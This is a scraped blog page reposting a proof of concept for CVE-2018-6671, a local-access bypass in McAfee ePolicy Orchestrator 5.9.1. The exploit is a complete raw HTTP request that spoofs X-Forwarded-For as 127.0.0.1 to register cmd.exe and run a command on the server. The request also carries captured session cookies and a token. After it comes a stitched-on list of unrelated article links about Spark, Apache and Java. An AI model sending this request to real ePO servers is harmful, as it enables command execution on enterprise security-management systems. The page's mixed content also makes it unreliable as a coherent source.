# Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass

# Date: 2019-03-07

# Exploit Author: @leonjza

# Vendor Homepage: https://www.mcafee.com/

# Software Link: https://www.mcafee.com/enterprise/en-us/products/epolicy-orchestrator.html

# Version: ePO v5.9.1

# Tested on: Windows Server 2012

# CVE : cve-2018-6671

GIST LINK: https://gist.github.com/leonjza/17eb8ed9cba0ea1d2c70b82782c6d949

# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass

# Specifying an X-Forwarded-For header bypasses the local only check

# https://kc.mcafee.com/corporate/index?page=content&id=SB10240

# https://nvd.nist.gov/vuln/detail/CVE-2018-6671

#

# 2019 @leonjza

#

# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850

POST /Notifications/testRegExe.do HTTP/1.1

Host: 192.168.1.26:8443

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)

Gecko/20100101 Firefox/66.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://192.168.1.26:8443/Notifications/addRegExecutable.do?orion.user.security.token=Bp5pZJOQll2vryhC

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Content-Length: 284

DNT: 1

Connection: close

Cookie: JSESSIONID=645BCB1CE5B7DBE1B9EDC7BB9F2F7349.route1;

orion.login.language="language:en&country:";

orion.content.size="width:1384&height:699";

JSESSIONIDSSO=4D970A5F2DBF48309F796DF38B80FC15

X-Forwarded-For: 127.0.0.1

orion.user.security.token=Bp5pZJOQll2vryhC&orion.user.security.token=Bp5pZJOQll2vryhC&executableName=CVE-2018-6671%20PoC&executablePath=c:\windows\system32\cmd.exe&userName=&pass=&passConfirm=&testExeArgs=/c

whoami > c:\CVE-2018-6671.txt&testExeTime=60000&objectId=0&ajaxMode=standard

--

L.

:wq!

[EXP]McAfee ePO 5.9.1 - Registered Executable Local Access Bypass的更多相关文章

  1. [EXP]Joomla! Component Easy Shop 1.2.3 - Local File Inclusion

    # Exploit Title: Joomla! Component Easy Shop - Local File Inclusion # Dork: N/A # Date: -- # Exploit ...

  2. metasploit-post模块信息

    Name                                             Disclosure Date  Rank    Description ----           ...

  3. Spark安装过程

    Precondition:jdk.Scala安装,/etc/profile文件部分内容如下: JAVA_HOME=/home/Spark/husor/jdk CLASSPATH=.:$JAVA_HOM ...

  4. mod_cluster启用https协议的步骤

    1.生成SSL证书与私钥 Generate Private Key on the Server Running Apache + mod_ssl First, generate a private k ...

  5. PostgreSQL导出一张表到MySQL

    1. 查看PostgreSQL表结构,数据量,是否有特殊字段值 region_il=# select count(*) from result_basic; count --------- ( row ...

  6. Ubuntu12.04 Bugzilla 和 TestOpia的安装步骤

    1.        安装apache User@ubuntu:$  sudo apt-get install apache2 注:安装完以后能够通过http://192.168.128.128/ 来訪 ...

  7. window7配置python3.3 + django + apache24 + mod_wsgi

    window7安装配置python3.3 + django + apache24 + mod_wsgi 1.下载版本的时候要对应 2.apache24 别放系统盘, 不然权限很麻烦 3.django ...

  8. DYNAMIC LINK LIBRARY - DLL

    https://www.tenouk.com/ModuleBB.html MODULE BB DYNAMIC LINK LIBRARY - DLL Part 1: STORY What do we h ...

  9. Apache 与 php的环境搭建

    Apache和PHP的版本分别为: httpd-2.4.9-win64-VC11.zip php-5.6.9-Win32-VC11-x64.zip 下载地址: php-5.6.9-Win32-VC11 ...

随机推荐

  1. 专题 查找与排序的Java代码实现(一)

    专题 查找与排序的Java代码实现(一) 查找(Searching) 线性查找(linear search) 属于无序查找算法,适合于存储结构为顺序存储或链接存储的线性表. 基本思想:从数据结构线形表 ...

  2. 简单了解pytorch的forward

    import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from torch.autogra ...

  3. 在Laravel中使用mongoDB

    https://blog.csdn.net/weixin_38682852/article/details/80840678?utm_source=blogxgwz1 https://blog.csd ...

  4. 动态加载、移除js、css

    本文简单介绍动态加载.移除.替换js/css文件 .有时候我们在写前端的时候,会有出现需要动态加载一些东如css js 这样能减轻用户加载负担,从而提高响应效率.下面贴出代码.//JS写法 <s ...

  5. input text 只能输入数字

    添加 onkeyup="value=value.replace(/[^\d]/g,'')"

  6. 386. Lexicographical Numbers 输出1到n之间按lexico排列的数字序列

    [抄题]: Given an integer n, return 1 - n in lexicographical order. For example, given 13, return: [1,1 ...

  7. WordPress 自动初始化数据库

    背景 自动化搭建开发环境.测试.部署如通过网页操作(访问 /wp-admin/install.php)相对比较麻烦且在有的场景无法实现. 步骤 修改 wp-config.php 配置 wordpres ...

  8. Admin注册和路由分发详解

    Admin注册和路由分发详解 1.启动 #autodiscover_modules('admin', register_to=site) 2.注册 1.单例对象 admin.site = AdminS ...

  9. CentOS7中firewall防火墙详解和配置,.xml服务配置详解

    修改防火墙配置文件之前,需要对之前防火墙做好备份 重启防火墙后,需要确认防火墙状态和防火墙规则是否加载,若重启失败或规则加载失败,则所有请求都会被防火墙 1. firewall-cmd --state ...

  10. Java 正则表达式之捕获组

    Java 正则表达式之捕获组 1. Java 正则表达式基础 2. Java 正则表达式之捕获组 一.概述 1.1 什么是捕获组 捕获组就是把正则表达式中子表达式匹配的内容,保存到内存中以数字编号或显 ...